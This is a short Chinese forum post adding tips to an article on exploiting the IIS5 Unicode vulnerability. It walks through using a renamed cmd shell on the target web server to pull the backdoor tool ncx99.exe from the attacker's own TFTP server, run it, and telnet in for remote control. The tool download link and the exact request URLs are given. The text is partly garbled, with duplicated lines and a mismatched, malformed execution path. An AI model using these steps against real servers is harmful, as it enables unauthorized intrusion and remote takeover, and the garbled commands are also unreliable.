IIS5UNICODE編碼漏洞的利用心得補充
看了你的文章【unicode】寫的很好,
我來說說用tftp怎么搞:
下載http://www.cners.com/tools/unicode.zip(下載快著呢)
解壓:
tftpd32.exe
ncx99.exe
我來說說用tftp怎么搞:
下載http://www.cners.com/tools/unicode.zip(下載快著呢)
解壓:
tftpd32.exe
ncx99.exe
本機運行tftpd32.exe
再(接著你的來):
http://192.168.8.48/scripts/ccc.exe?/c+tftp -i 本地ip GET ncx99.exe c:\inetpub\scripts\hihi.exe
注意了:這是將你本機的ncx99.exe 上傳到對方的 scripts下!
下面執行它:
http://192.168.8.48/scripts/ccc.exe?/c+c:inetpubscriptssr.exe
這時在你的tftp上就能看到對方ip的信息了!
下面可以干的就不用說了!
用telnet 或SecureCRT.EXE軟件登陸192.168.8.48就可以了!(推薦用SecureCrt)
{
零點
http://www.net7b.com{我的站點}
http://www.net7b.com/net7b_heike(網絡奇兵網絡安全中心)